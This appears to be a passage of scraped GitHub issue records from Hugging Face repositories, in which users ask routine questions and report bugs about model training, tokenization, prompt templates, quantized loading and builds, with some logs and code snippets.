"https://github.com/huggingface/chat-ui/issues/592", "state": "open", "labels": [ "bug", "documentation", "back" ], "created_at": "2023-11-28T18:50:15Z", "updated_at": "2023-11-29T13:29:22Z", "comments": 1, "user": "muscionig" }, { "repo": "huggingface/transformers.js", "number": 421, "title": "[Question] FeatureExtractionPipeline input length", "body": "@xenova : First of all thank you so much for your amazing work with this open source library. It opens up many possibilities.\r\n\r\nOne thing that caught my attention which is [FeatureExtractionPipeline](https://huggingface.co/docs/transformers.js/api/pipelines#module_pipelines.FeatureExtractionPipeline) can accept any amount of input regardless of the models' [sequence lengths](https://huggingface.co/spaces/mteb/leaderboard). Does it truncate or tokenize the data internally before applying it to the model? Is there documentation or an explanation about the implementation details?", "url": "https://github.com/huggingface/transformers.js/issues/421", "state": "closed", "labels": [ "question" ], "created_at": "2023-11-28T17:28:28Z", "updated_at": "2023-12-02T11:20:52Z", "user": "devfacet" }, { "repo": "huggingface/sentence-transformers", "number": 2361, "title": "How to divide long texts into chunks using sentence-transformers?", "body": "Hello, I encounter the issue of my texts exceeding the maximum lengths allowed by pretrained models. So I intend to divide my texts into smaller chunks and then calculate the average embeddings over them.\r\n\r\nHowever, I find this process is not as straightforward as I initially thought. \r\n\r\nIn order to properly chunk the texts, I need to obtain the tokenized version of each text to determine the exact number of tokens. 
\r\n\r\nUnfortunately, it seems that the tokenizers in sentence-transformers are not standalone, meaning they can not tokenize long texts.\r\n\r\nSo what is the best way to solve this problem?\r\n\r\n", "url": "https://github.com/huggingface/sentence-transformers/issues/2361", "state": "closed", "labels": [], "created_at": "2023-11-28T16:35:44Z", "updated_at": "2023-12-25T12:38:42Z", "user": "srhouyu" }, { "repo": "huggingface/alignment-handbook", "number": 56, "title": "Why does the alignment-handbook account for user & system Inputs in loss calculation", "body": "I noticed that the alignment-handbook doesn't ignore the loss calculated from both the user and system inputs Based on my knowledge, many SFT choose to ignore these. I'm curious about the reasoning behind this difference.", "url": "https://github.com/huggingface/alignment-handbook/issues/56", "state": "open", "labels": [], "created_at": "2023-11-28T06:03:53Z", "updated_at": "2024-05-30T07:45:29Z", "comments": 3, "user": "xffxff" }, { "repo": "huggingface/transformers", "number": 27737, "title": "How to save the generated output of BarkModel to an npz file?", "body": "Hello there!\r\n\r\nI'm using the BarkModel from Hugging Face Transformers and I'm wondering how to save the generated results to an npz file. I'd like to use these saved results as history prompts for the next generation.\r\n\r\nIn the [suno-ai/bark](https://github.com/suno-ai/bark) , when using the [`semantic_to_waveform`](https://github.com/suno-ai/bark/blob/main/bark/api.py#L35) method, I can pass `output_full = True`. This allows me to save the output to an npz file using `numpy.savez`.\r\n\r\nHowever, as I transition to using the BarkModel within the transformers framework, I am uncertain about the equivalent process. Could you kindly provide guidance on how to save the generated results of the BarkModel to an npz file in the Transformers library?\r\n\r\nAny assistance or code examples you could offer would be greatly appreciated.\r\n\r\nThank you for your time and support.", "url": "https://github.com/huggingface/transformers/issues/27737", "state": "closed", "labels": [], "created_at": "2023-11-28T03:55:19Z", "updated_at": "2024-01-10T08:03:57Z", "user": "chet-chen" }, { "repo": "huggingface/alignment-handbook", "number": 55, "title": "Running on single GPU(16GB)", "body": "Hi,\r\n\r\nWhat is the best way to run this on my high performance laptop?\r\nShould this somehow work? Can i calculate how many days/weeks it will run? 
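> Note on huggingface/sentence-transformers#2361 above: the underlying Hugging Face tokenizer is exposed as `model.tokenizer` in recent sentence-transformers versions, which makes token-accurate chunking straightforward. A hedged sketch of chunk-then-average (model name and chunk size are illustrative):

```python
import numpy as np
from sentence_transformers import SentenceTransformer

model = SentenceTransformer("all-MiniLM-L6-v2")
tok = model.tokenizer  # the underlying Hugging Face tokenizer

def embed_long_text(text, chunk_tokens=256):
    # Tokenize once, slice into fixed-size token windows, decode each back to text.
    ids = tok(text, add_special_tokens=False)["input_ids"]
    chunks = [tok.decode(ids[i:i + chunk_tokens]) for i in range(0, len(ids), chunk_tokens)]
    # Encode all chunks and average their embeddings.
    embeddings = model.encode(chunks)
    return np.mean(embeddings, axis=0)
```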
\r\n\r\nThanks in advance\r\n\r\nSpecs:\r\n\r\n> OS: Win 11 (WSL2)\r\n> CPU: Intel Core i7 12850HX\r\n> Make: Lenovo Thinkpad P16 gen 1\r\n> Memory: 128GB DDR5-4800 (2400MHz) \r\n> GPU: Nvidia RTX A5500 16GB\r\n\r\nI found that this command would work on my laptop it seems:\r\n`ACCELERATE_LOG_LEVEL=info accelerate launch --config_file recipes/accelerate_configs/multi_gpu.yaml --num_processes=1 scripts/run_sft.py recipes/zephyr-7b-beta/sft/config_lora.yaml --load_in_4bit=true --gradient_accumulation_steps=1024 --per_device_eval_batch_size=1 --per_device_train_batch_size=1`\r\n\r\nhow now run it for 1-2 hours ish:\r\n\r\n> ACCELERATE_LOG_LEVEL=info accelerate launch --config_file recipes/accelerate_configs/multi_gpu.yaml --num_processes=1 scripts/run_sft.py recipes/zephyr-7b-beta/sft/config_lora.yaml --load_in_4bit=true --gradient_accumulation_steps=1024 --per_device_eval_batch_size=1 --per_device_train_batch_size=1\r\n> INFO:root:Using nproc_per_node=1.\r\n> 2023-11-27 15:41:33.914308: I tensorflow/core/util/port.cc:110] oneDNN custom operations are on. You may see slightly different numerical results due to floating-point round-off errors from different computation orders. To turn them off, set the environment variable `TF_ENABLE_ONEDNN_OPTS=0`.\r\n> 2023-11-27 15:41:33.941565: I tensorflow/core/platform/cpu_feature_guard.cc:182] This TensorFlow binary is optimized to use available CPU instructions in performance-critical operations.\r\n> To enable the following instructions: AVX2 AVX_VNNI FMA, in other operations, rebuild TensorFlow with the appropriate compiler flags.\r\n> 2023-11-27 15:41:34.582753: W tensorflow/compiler/tf2tensorrt/utils/py_utils.cc:38] TF-TRT Warning: Could not find TensorRT\r\n> [2023-11-27 15:41:35,164] [INFO] [real_accelerator.py:158:get_accelerator] Setting ds_accelerator to cuda (auto detect)\r\n> /usr/local/lib/python3.11/dist-packages/trl/trainer/ppo_config.py:141: UserWarning: The `optimize_cuda_cache` arguement will be deprecated soon, please use `optimize_device_cache` instead.\r\n> warnings.warn(\r\n> 2023-11-27 15:41:35 - WARNING - __main__ - Process rank: 0, device: cuda:0, n_gpu: 1 distributed training: True, 16-bits training: False\r\n> 2023-11-27 15:41:35 - INFO - __main__ - Model parameters ModelArguments(base_model_revision=None, model_name_or_path='mistralai/Mistral-7B-v0.1', model_revision='main', model_code_revision=None, torch_dtype='auto', trust_remote_code=False, use_flash_attention_2=True, use_peft=True, lora_r=64, lora_alpha=16, lora_dropout=0.1, lora_target_modules=['q_proj', 'k_proj', 'v_proj', 'o_proj'], lora_modules_to_save=None, load_in_8bit=False, load_in_4bit=True, bnb_4bit_quant_type='nf4', use_bnb_nested_quant=False)\r\n> 2023-11-27 15:41:35 - INFO - __main__ - Data parameters DataArguments(chat_template=None, dataset_mixer={'HuggingFaceH4/ultrachat_200k': 1.0}, dataset_splits=['train_sft', 'test_sft'], max_train_samples=None, max_eval_samples=None, preprocessing_num_workers=12, truncation_side=None)\r\n> 2023-11-27 15:41:35 - INFO - __main__ - Training/evaluation parameters SFTConfig(\r\n> _n_gpu=1,\r\n> adafactor=False,\r\n> adam_beta1=0.9,\r\n> adam_beta2=0.999,\r\n> adam_epsilon=1e-08,\r\n> auto_find_batch_size=False,\r\n> bf16=True,\r\n> bf16_full_eval=False,\r\n> data_seed=None,\r\n> dataloader_drop_last=False,\r\n> dataloader_num_workers=0,\r\n> dataloader_pin_memory=True,\r\n> ddp_backend=None,\r\n> ddp_broadcast_buffers=None,\r\n> ddp_bucket_cap_mb=None,\r\n> ddp_find_unused_parameters=None,\r\n> ddp_timeout=1800,\r\n> 
debug=[],\r\n> deepspeed=None,\r\n> disable_tqdm=False,\r\n> dispatch_batches=None,\r\n> do_eval=True,\r\n> do_predict=False,\r\n> do_train=False,\r\n> eval_accumulation_steps=None,\r\n> eval_delay=0,\r\n> eval_steps=None,\r\n> evaluation_strategy=IntervalStrategy.EPOCH,\r\n> fp16=False,\r\n> fp16_backend=auto,\r\n> fp16_full_eval=False,\r\n> fp16_opt_level=O1,\r\n> fsdp=[],\r\n> fsdp_config={'min_num_params': 0, 'xla': False, 'xla_fsdp_grad_ckpt': False},\r\n> fsdp_min_num_params=0,\r\n> fsdp_transformer_layer_cls_to_wrap=None,\r\n> full_determinism=False,\r\n> gradient_accumulation_steps=1024,\r\n> gradient_checkpointing=True,\r\n> gradient_checkpointing_kwargs={'use_reentrant': False},\r\n> greater_is_better=None,\r\n> group_by_length=False,\r\n> half_precision_backend=auto,\r\n> hub_always_push=False,\r\n> hub_model_id=zephyr-7b-sft-lora,\r\n> hub_private_repo=False,\r\n> hub_strategy=HubStrategy.EVERY_SAVE,\r\n> hub_token=,\r\n> ignore_data_skip=False,\r\n> include_inputs_for_metrics=False,\r\n> include_tokens_per_second=False,\r\n> jit_mode_eval=False,\r\n> label_names=None,\r\n> label_smoothing_factor=0.0,\r\n> learning_rate=2e-05,\r\n> length_column_name=length,\r\n> load_best_model_at_end=False,\r\n> local_rank=0,\r\n> log_level=info,\r\n> log_level_replica=warning,\r\n> log_on_each_node=True,\r\n> logging_dir=data/zephyr-7b-sft-lora/runs/Nov27_15-41-35,\r\n> logging_first_step=True,\r\n> logging_nan_inf_filter=True,\r\n> logging_steps=5,\r\n> logg", "url": "https://github.com/huggingface/alignment-handbook/issues/55", "state": "open", "labels": [], "created_at": "2023-11-27T19:50:12Z", "updated_at": "2023-12-13T14:58:31Z", "comments": 1, "user": "patchie" }, { "repo": "huggingface/chat-ui", "number": 588, "title": "Hallucinations when using web search", "body": "I have tried to run a mistral model with the search api but the web results don't seem to be making it to the model.\r\n\r\nI'm hosting the model through text-gen-webui and encountering the exact same issue as #571. 
\r\n\r\nI've given it a go with [openhermes-2.5-mistral-7b.Q5_K_M.gguf](https://imgur.com/a/HQV1lGD), [it seems to use the search tool just fine](https://imgur.com/a/GN9ycZY) but fails to incorporate the results into its answer.\r\n\r\nAny idea how to fix this issue or at least how I could help with debugging.", "url": "https://github.com/huggingface/chat-ui/issues/588", "state": "open", "labels": [ "support", "websearch" ], "created_at": "2023-11-27T17:12:22Z", "updated_at": "2023-12-27T21:25:42Z", "comments": 2, "user": "NasonZ" }, { "repo": "huggingface/chat-ui", "number": 587, "title": "How do I format the ChatPromptTemplate ?", "body": "I currently have a working setup with llamacpp+mistral 7b instruct with the following loca.env :\r\n```\r\nMODELS=`[\r\n {\r\n \"name\": \"Mistral\",\r\n \"chatPromptTemplate\": \"{{#each messages}}{{#ifUser}}[INST] {{#if @first}}{{#if @root.preprompt}}{{@root.preprompt}}\\n{{/if}}{{/if}} {{content}} [/INST]{{/ifUser}}{{#ifAssistant}}{{content}} {{/ifAssistant}}{{/each}}\",\r\n \"parameters\": {\r\n \"temperature\": 0.1,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 4096,\r\n \"max_new_tokens\": 4096,\r\n \"stop\": [\"\"]\r\n },\r\n \"endpoints\": [{\r\n \"url\": \"http://127.0.0.1:8080\",\r\n \"type\": \"llamacpp\"\r\n }\r\n/\r\n ]\r\n }\r\n]`\r\n``` \r\n\r\nI am trying to set up the model \"Neural Chat\" by intel , and the tamplate is:\r\n\r\n\r\n### System:\r\n{system_message}\r\n\r\n### User:\r\n{prompt}\r\n\r\n### Assistant:\r\n\r\nHow can I set the chatPromptTemplate to match it? and so it knows to summarize and search the web correctly?\r\nIm having some issues to understand how to format it, and where to put ### User ETC.\r\n\r\nThanks", "url": "https://github.com/huggingface/chat-ui/issues/587", "state": "open", "labels": [ "support", "models" ], "created_at": "2023-11-27T15:21:17Z", "updated_at": "2023-12-19T07:21:50Z", "comments": 5, "user": "iChristGit" }, { "repo": "huggingface/candle", "number": 1379, "title": "Help request: How to compile CUDA kernels with `cc-rs`?", "body": "Hello everybody,\r\n\r\nIn the process of adding PagedAttention to candle-vllm, I need to compile some CUDA kernels. I am currently trying to use `cc-rs` in a `build.rs` to automatically build the kernels. However, I am not making much progress as I have run into issues that seem to be tied to the build stage.\r\n\r\nI would really appreciate some pointers on how to use either `nvcc` or `cc-rs` to build these CUDA kernels. I have opened an issue with vllm: vllm-project/vllm#1793. \r\n\r\nThanks,\r\nEric", "url": "https://github.com/huggingface/candle/issues/1379", "state": "closed", "labels": [], "created_at": "2023-11-27T14:32:10Z", "updated_at": "2023-11-27T20:57:11Z", "user": "EricLBuehler" }, { "repo": "huggingface/transformers", "number": 27726, "title": "How to load PixArtAlphaPipeline in 8bit?", "body": "I know there is example but I couldn't make it work. 
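> Note on huggingface/chat-ui#587 above: following the same Handlebars conventions as the working Mistral template quoted in that issue (`{{#ifUser}}`, `{{#ifAssistant}}`, `{{@root.preprompt}}` on the first user turn), a hedged, untested guess at a Neural-Chat-style `chatPromptTemplate` would be:

```env
"chatPromptTemplate": "{{#each messages}}{{#ifUser}}{{#if @first}}{{#if @root.preprompt}}### System:\n{{@root.preprompt}}\n\n{{/if}}{{/if}}### User:\n{{content}}\n\n### Assistant:\n{{/ifUser}}{{#ifAssistant}}{{content}}\n\n{{/ifAssistant}}{{/each}}"
```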
I am trying to make an auto installer and gradio interface for Pix Art Alpha Pipeline so common people can install and use on their Windows PCs\r\n\r\nCurrently my below code working and I want to make it load in 8 bit is that possible?\r\n\r\n```\r\nif torch.cuda.is_available():\r\n pipe = PixArtAlphaPipeline.from_pretrained(\r\n \"PixArt-alpha/PixArt-XL-2-1024-MS\",\r\n torch_dtype=torch.float16,\r\n use_safetensors=True,\r\n )\r\n\r\n if ENABLE_CPU_OFFLOAD:\r\n pipe.enable_model_cpu_offload()\r\n else:\r\n pipe.to(device)\r\n print(\"Loaded on Device!\")\r\n\r\n # speed-up T5\r\n pipe.text_encoder.to_bettertransformer()\r\n\r\n if USE_TORCH_COMPILE:\r\n pipe.transformer = torch.compile(pipe.transformer, mode=\"reduce-overhead\", fullgraph=True)\r\n print(\"Model Compiled!\")\r\n```\r\n\r\n```\r\n seed = int(randomize_seed_fn(seed, randomize_seed))\r\n generator = torch.Generator().manual_seed(seed)\r\n\r\n if schedule == 'DPM-Solver':\r\n if not isinstance(pipe.scheduler, DPMSolverMultistepScheduler):\r\n pipe.scheduler = DPMSolverMultistepScheduler()\r\n num_inference_steps = dpms_inference_steps\r\n guidance_scale = dpms_guidance_scale\r\n elif schedule == \"SA-Solver\":\r\n if not isinstance(pipe.scheduler, SASolverScheduler):\r\n pipe.scheduler = SASolverScheduler.from_config(pipe.scheduler.config, algorithm_type='data_prediction', tau_func=lambda t: 1 if 200 <= t <= 800 else 0, predictor_order=2, corrector_order=2)\r\n num_inference_steps = sas_inference_steps\r\n guidance_scale = sas_guidance_scale\r\n else:\r\n raise ValueError(f\"Unknown schedule: {schedule}\")\r\n\r\n if not use_negative_prompt:\r\n negative_prompt = None # type: ignore\r\n prompt, negative_prompt = apply_style(style, prompt, negative_prompt)\r\n\r\n images = pipe(\r\n prompt=prompt,\r\n width=width,\r\n height=height,\r\n guidance_scale=guidance_scale,\r\n num_inference_steps=num_inference_steps,\r\n generator=generator,\r\n num_images_per_prompt=NUM_IMAGES_PER_PROMPT,\r\n use_resolution_binning=use_resolution_binning,\r\n output_type=\"pil\",\r\n ).images\r\n```\r\n\r\n### Who can help?\r\n\r\n@sayakpaul @Narsil @SunMarc @younesbelkada @gante \r\n\r\n\r\nI tried below but it broken the app\r\n\r\n```\r\ntext_encoder = T5EncoderModel.from_pretrained(\r\n \"PixArt-alpha/PixArt-XL-2-1024-MS\",\r\n subfolder=\"text_encoder\",\r\n load_in_8bit=True,\r\n device_map=\"auto\",\r\n\r\n)\r\npipe = PixArtAlphaPipeline.from_pretrained(\r\n \"PixArt-alpha/PixArt-XL-2-1024-MS\",\r\n text_encoder=text_encoder,\r\n transformer=None,\r\n device_map=\"auto\"\r\n)\r\n```\r\n\r\nThe error I am getting is like below\r\n\r\n```\r\nDownloading shards: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 2/2 [00:00 If you scale up/down the number of GPUs, we recommend also scaling up the per-device batch size or number of gradient accumulation steps to keep the global batch size constant (and thus replicate our results).\r\n\r\nQ: What is the expected \"global batch size\"?\r\n\r\nFor 
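> Note on huggingface/transformers#27726 above: the usual pattern (mirroring the memory-optimization example in the PixArt docs, assuming a recent diffusers) is two stages: encode the prompt with the 8-bit T5, free it, then run the rest of the pipeline in fp16 with the precomputed embeddings. The direct `device_map="auto"` pipeline in the issue fails because the transformer is skipped but never replaced. A hedged sketch:

```python
import gc
import torch
from transformers import T5EncoderModel
from diffusers import PixArtAlphaPipeline

repo = "PixArt-alpha/PixArt-XL-2-1024-MS"

# Stage 1: load only the 8-bit text encoder; transformer=None skips the DiT.
text_encoder = T5EncoderModel.from_pretrained(
    repo, subfolder="text_encoder", load_in_8bit=True, device_map="auto"
)
pipe = PixArtAlphaPipeline.from_pretrained(
    repo, text_encoder=text_encoder, transformer=None, device_map="auto"
)
with torch.no_grad():
    embeds, mask, neg_embeds, neg_mask = pipe.encode_prompt("a small red panda")

# Free the T5 before loading the transformer.
del text_encoder, pipe
gc.collect()
torch.cuda.empty_cache()

# Stage 2: rest of the pipeline in fp16, fed the precomputed embeddings.
pipe = PixArtAlphaPipeline.from_pretrained(
    repo, text_encoder=None, torch_dtype=torch.float16
).to("cuda")
image = pipe(
    negative_prompt=None,
    prompt_embeds=embeds,
    prompt_attention_mask=mask,
    negative_prompt_embeds=neg_embeds,
    negative_prompt_attention_mask=neg_mask,
).images[0]
```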
example, I'm trying to run this on 2x3090s and need to know what the expected global batch size is so I can adjust the accumulation steps and per device train batch size.\r\n\r\nThanks much!", "url": "https://github.com/huggingface/alignment-handbook/issues/50", "state": "closed", "labels": [], "created_at": "2023-11-26T21:47:41Z", "updated_at": "2023-11-27T04:14:22Z", "user": "ohmeow" }, { "repo": "huggingface/transformers.js", "number": 417, "title": "[Question] Any examples of processing video frames of a user uploaded video (specifically for depth estimation)?", "body": "Hi there, I'm wondering if there are any examples of processing video frames of a user uploaded video? I'm specifically looking to run depth estimation on each frame of a short video, but any similar example would be useful.\r\n\r\nIf not, does this approach seem correct?\r\n* Use one of the approaches described [here](https://stackoverflow.com/questions/32699721/javascript-extract-video-frames-reliably) to draw each frame of the video to a canvas\r\n* Call `HTMLCanvasElement.toBlob()` on the canvas to get a `Blob`\r\n* Pass N (10?) of those Blobs to a worker at a time\r\n* For each of those Blobs call `const image = await RawImage.fromBlob(blob)` to get a `RawImage`\r\n* Run depth estimation on the list of images with `await classifier([rawImage1, rawImage2, etc.])`\r\n\r\nThanks for any help!\r\n", "url": "https://github.com/huggingface/transformers.js/issues/417", "state": "open", "labels": [ "question" ], "created_at": "2023-11-26T09:18:04Z", "updated_at": "2023-12-10T22:51:18Z", "user": "jparismorgan" }, { "repo": "huggingface/chat-ui", "number": 583, "title": "Option to share the web interface locally/online ?", "body": "I wish we could make the ui available on phone/mac or even outside the local network.\r\nFor example in SillyTavern (https://github.com/SillyTavern/SillyTavern)\r\nYou can either open it up to all devices in the local network or open a cloudflare tunnel to access it through a link.\r\nIs that possible to add? ", "url": "https://github.com/huggingface/chat-ui/issues/583", "state": "open", "labels": [ "enhancement", "back" ], "created_at": "2023-11-26T00:44:08Z", "updated_at": "2024-04-22T16:45:44Z", "comments": 2, "user": "iChristGit" }, { "repo": "huggingface/candle", "number": 1375, "title": "Question: How to interface a C++ API `torch::Tensor` with `candle_core::Tensor`?", "body": "I was wondering if there is a way to use a C++ API that accepts a Pytorch `torch::Tensor` with a Candle `candle_core::Tensor`? For reference, I want to use [this](https://github.com/vllm-project/vllm/blob/main/csrc/ops.h) C++ API.\r\n\r\nCan I convert between tensor types? 
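> Note on huggingface/alignment-handbook#50 above: the global batch size is just the product of per-device batch size, GPU count, and gradient accumulation steps; the reference values should be read from the recipe's yaml, and the numbers below are illustrative only:

```python
# global_batch = per_device_train_batch_size * num_gpus * gradient_accumulation_steps
# When dropping from 8 GPUs to 2, multiply per-device batch and/or accumulation
# by 4 to keep global_batch constant. Illustrative numbers, not the recipe's:
per_device_train_batch_size = 4
num_gpus = 2
gradient_accumulation_steps = 8
print(per_device_train_batch_size * num_gpus * gradient_accumulation_steps)  # 64
```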
@LaurentMazare, would it be possible to use [tch-rs](https://github.com/LaurentMazare/tch-rs) to make this conversion?\r\n\r\nThanks for any help!", "url": "https://github.com/huggingface/candle/issues/1375", "state": "closed", "labels": [], "created_at": "2023-11-25T19:05:27Z", "updated_at": "2023-11-25T23:04:03Z", "user": "EricLBuehler" }, { "repo": "huggingface/accelerate", "number": 2187, "title": "how to collect outputs(not tensor dtype) on multi gpus ", "body": "As the toy example below, \r\n\r\n```\r\nval_dataset = ['a', 'b', 'c', 'd', 'e']\r\nval_dataloader = DataLoader(\r\n val_dataset, batch_size=2\r\n )\r\naccelerator = Accelerator()\r\nval_dataloader = accelerator.prepare(val_dataloader)\r\nfor step, batch in enumerate(val_dataloader):\r\n print(batch, accelerator.device)\r\n```\r\n\r\nWhen i run this script by `CUDA_VISIBLE_DEVICES=\"0,1\" accelerate launch --config_file=\"./configs/acc_mgpu_config.yaml\" test_batch.py` , i will get below results, how can I get ['a', 'b', 'c', 'd', 'e'] in main process after reduce batch in all processes? \r\n```\r\n['a', 'b'] cuda:0\r\n['e', 'a'] cuda:0\r\n['c', 'd'] cuda:1\r\n['b', 'c'] cuda:1\r\n```\r\n\r\nI know that accelerate have a `gather_for_metrics` can gathers input and potentially **drops duplicates** in the last batch if on a distributed system. But this function seems only works for data which is tensor type, in this example, my data is string, is there any way to achieve this?\r\n(if i use `print(accelerator.gather_for_metrics((batch)), accelerator.device)`, it will raise error like below\r\n```\r\nTypeError: Unsupported types () passed to `_gpu_gather_one`. Only nested list/t\r\nuple/dicts of objects that are valid for `is_torch_tensor` should be passed.\r\n```\r\nThanks for any potential answers!", "url": "https://github.com/huggingface/accelerate/issues/2187", "state": "closed", "labels": [], "created_at": "2023-11-25T02:51:21Z", "updated_at": "2023-11-27T06:07:19Z", "user": "shliu0" }, { "repo": "huggingface/chat-ui", "number": 581, "title": "Trying to set up with TGI", "body": "I have installed TGI using docker, I can see the api docs at http://127.0.0.1:8080/docs/\r\nBut still cannot set up the env.local file, I have tried to set it up with the example, but always failing.\r\n![image](https://github.com/huggingface/chat-ui/assets/20077386/032a02c0-9d3b-473e-9c1b-a3c948eb06d3)\r\n![image](https://github.com/huggingface/chat-ui/assets/20077386/3cd0a46d-0334-448e-bad8-2124045abc42)Can someone who set it up correctly give me the rough idea of how to write the file ? I have tried a lot of combinations, and it always fail either internal error or the screenshot above.\r\n", "url": "https://github.com/huggingface/chat-ui/issues/581", "state": "open", "labels": [ "support" ], "created_at": "2023-11-24T19:20:27Z", "updated_at": "2023-12-19T06:02:25Z", "comments": 2, "user": "iChristGit" }, { "repo": "huggingface/transformers.js", "number": 412, "title": "[Question] Does any version support Node 14", "body": "Hi,\r\n\r\nI have tried downgrading the library to version 2, and even to 1, but that one was missing types.\r\n\r\nIs there some way to be able to use it with Node 14? 
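For the accelerate string-gathering question above: `accelerate.utils.gather_object` handles arbitrary picklable Python objects, whereas `gather`/`gather_for_metrics` only accept tensors. A sketch of the toy example (note that `gather_object` does not drop the duplicates the distributed sampler pads in, so deduplicate manually if that matters):

```python
from torch.utils.data import DataLoader
from accelerate import Accelerator
from accelerate.utils import gather_object

val_dataset = ["a", "b", "c", "d", "e"]
accelerator = Accelerator()
val_dataloader = accelerator.prepare(DataLoader(val_dataset, batch_size=2))

collected = []
for batch in val_dataloader:
    collected.extend(batch)  # each batch is a plain list of strings

all_items = gather_object(collected)  # every rank receives the full list
if accelerator.is_main_process:
    print(sorted(set(all_items)))  # ['a', 'b', 'c', 'd', 'e']
```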
I have seen that mostly the issues are with nullish coalescing characters, so wanted to make sure if there could be other issues that tie it to Node 18+, and also if there have been any security and vulnerability issues from said version (that could work with Node 14).\r\n\r\nThanks\r\n", "url": "https://github.com/huggingface/transformers.js/issues/412", "state": "closed", "labels": [ "question" ], "created_at": "2023-11-24T16:01:54Z", "updated_at": "2023-12-04T13:16:26Z", "user": "Ncifra" }, { "repo": "huggingface/hf_transfer", "number": 20, "title": "[Usage] How to enable the progress bar?", "body": "I've installed `hf_transfer-0.1.4`.\r\nBut when I use `huggingface-cli download`, the progress bar mentioned [here](https://huggingface.co/docs/huggingface_hub/guides/download#faster-downloads) seems to be disabled at default.\r\nAnd I failed to figure out how to enable it.\r\nCould anyone be kind enough to provide some guidance?", "url": "https://github.com/huggingface/hf_transfer/issues/20", "state": "closed", "labels": [], "created_at": "2023-11-24T08:13:00Z", "updated_at": "2023-11-27T12:15:10Z", "user": "tongyx361" }, { "repo": "huggingface/gsplat.js", "number": 39, "title": "How to implement point clouds render?", "body": "Hi, great work! I see that this library is upon [antimatter15/splat](https://github.com/antimatter15/splat), but this library does not have the same render which is very similar to point clouds like that lib. I want to know how to implement this function base on your gsplat library? By the way, do you have any document about the config options, so I can set some render options?", "url": "https://github.com/huggingface/gsplat.js/issues/39", "state": "open", "labels": [], "created_at": "2023-11-24T07:27:33Z", "updated_at": "2024-01-22T21:12:06Z", "user": "xinnai" }, { "repo": "huggingface/alignment-handbook", "number": 46, "title": "Weird DPO loss", "body": "Hi, I would like to raise some attention to issue #38.\r\n\r\nIt seems that the DPO-Lora training loss (red line) drops abruptly at the beginning of each epoch, which seems weird. (I tried Lora model global batch size 64, multi_gpu acceleration, 8GPUs, learning rate 1e-4, others same suggested) \r\n\r\nIn the mean time, the full parameter fine tunning has no such problem (official settings). \r\n\r\n![image](https://github.com/huggingface/alignment-handbook/assets/40993476/5ffa7fd5-c93b-44e5-a150-2a133371ab13)\r\n\r\nI don't know if this is normal and **assume this is a bug associated with the lora model**. Is there any explanations? Has anyone encountered the same issue? If your rerun loss is normal, can you share your configs?", "url": "https://github.com/huggingface/alignment-handbook/issues/46", "state": "open", "labels": [], "created_at": "2023-11-24T03:07:46Z", "updated_at": "2024-05-28T07:09:10Z", "comments": 1, "user": "ChenDRAG" }, { "repo": "huggingface/diffusers", "number": 5912, "title": "How to set config in VaeImageProcessor?", "body": "I created a `StableDiffusionControlNetImg2ImgPipeline` and I want to manually set the config `do_normalize` in `VaeImageProcessor`. I wonder how can I set? 
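For the `VaeImageProcessor` question above: `do_normalize` lives on the pipeline's `image_processor`, not in `pipe.vae.config`, and the processor's config is frozen after construction, so the simplest route is to swap in a processor built with the flag you want. A sketch, assuming `pipe` is the `StableDiffusionControlNetImg2ImgPipeline` from the question:

```python
from diffusers.image_processor import VaeImageProcessor

# Rebuild the processor with do_normalize off, keeping the pipeline's
# existing VAE scale factor so resizing behaviour is unchanged.
pipe.image_processor = VaeImageProcessor(
    vae_scale_factor=pipe.vae_scale_factor,
    do_normalize=False,
)
```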
I look for it in the pipe.vae.config and see nothing about it.", "url": "https://github.com/huggingface/diffusers/issues/5912", "state": "closed", "labels": [ "stale" ], "created_at": "2023-11-23T12:54:22Z", "updated_at": "2023-12-26T21:29:17Z", "user": "youyuge34" }, { "repo": "huggingface/chat-ui", "number": 576, "title": "Cannot build using latest Chat UI Space template", "body": "Using the Dockerfile created from the ChatUI-Space template, but cloning it to a local machine and trying to build it fails at `npm run build`\r\n\r\n> #18 [chatui-builder 12/12] RUN npm run build\r\n#0 0.673\r\n#0 0.673 > chat-ui@0.6.0 build\r\n#0 0.673 > vite build\r\n#0 0.673\r\n#0 1.678 vite v4.3.9 building SSR bundle for production...\r\n#0 1.678\r\n#0 1.707 transforming...\r\n#0 4.381 \"BaseClient\" and \"TokenSet\" are imported from external module \"openid-client\" but never used in \"src/lib/server/auth.ts\".\r\n#0 4.381 \u2713 210 modules transformed.\r\n#0 4.473 rendering chunks...\r\n#0 5.665\r\n#0 5.665 node:internal/event_target:1036\r\n#0 5.665 process.nextTick(() => { throw err; });\r\n#0 5.665 ^\r\n#0 5.666 SyntaxError [Error]: Bad control character in string literal in JSON at position 157\r\n#0 5.666 at JSON.parse ()\r\n#0 5.666 at file:///app/chat-ui/.svelte-kit/output/server/chunks/models.js:512:51\r\n#0 5.666 at ModuleJob.run (node:internal/modules/esm/module_job:193:25)\r\n#0 5.666 Emitted 'error' event on Worker instance at:\r\n#0 5.666 at [kOnErrorMessage] (node:internal/worker:309:10)\r\n#0 5.666 at [kOnMessage] (node:internal/worker:320:37)\r\n#0 5.666 at MessagePort. (node:internal/worker:216:57)\r\n#0 5.666 at [nodejs.internal.kHybridDispatch] (node:internal/event_target:761:20)\r\n#0 5.666 at exports.emitMessage (node:internal/per_context/messageport:23:28)\r\n#0 5.666\r\n#0 5.666 Node.js v19.9.0\r\n#0 5.751 npm notice\r\n#0 5.751 npm notice New major version of npm available! 9.6.3 -> 10.2.4\r\n#0 5.751 npm notice Changelog: \r\n#0 5.751 npm notice Run `npm install -g npm@10.2.4` to update!\r\n#0 5.751 npm notice\r\n#18 ERROR: process \"/bin/sh -c npm run build\" did not complete successfully: exit code: 1\r\n#------\r\n#> [chatui-builder 12/12] 